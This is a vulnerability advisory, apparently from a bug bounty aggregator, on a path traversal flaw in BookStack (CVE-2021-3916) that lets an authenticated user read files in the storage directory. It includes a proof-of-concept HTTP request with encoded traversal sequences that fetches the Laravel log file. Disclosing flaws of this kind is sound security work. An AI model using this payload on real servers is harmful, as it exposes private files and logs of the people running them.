Lucene search
Theworstcomrade0BE32E6B-7C48-43F0-9CEC-433000AD8F64HistoryOct 30, 2021 - 8:26 p.m.
Path Traversal in bookstackapp/bookstack
2021-10-3020:26:21
theworstcomrade
www.huntr.dev
11
path traversal
bookstack
authenticated user
storage directory
predictable paths
log files
EPSS
0.001
Percentile
26.8%
Description
During reading recent BookStack source code (85dc8d) I discovered path traversal vulnerability. Authenticated user can have access to all files stored in storage directory.
Proof of Concept
GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1
Impact
Read log files which paths are predictable.
Related
nvd
nvd
CVE-2021-3916
2021-11-05 15:15:07
prion
prion
Path traversal
2021-11-05 15:15:00
cvelist
cvelist
CVE-2021-3916 Path Traversal in bookstackapp/bookstack
2021-11-05 14:50:19
osv
osv
CVE-2021-3916
2021-11-05 15:15:07
cve
cve
CVE-2021-3916
2021-11-05 15:15:07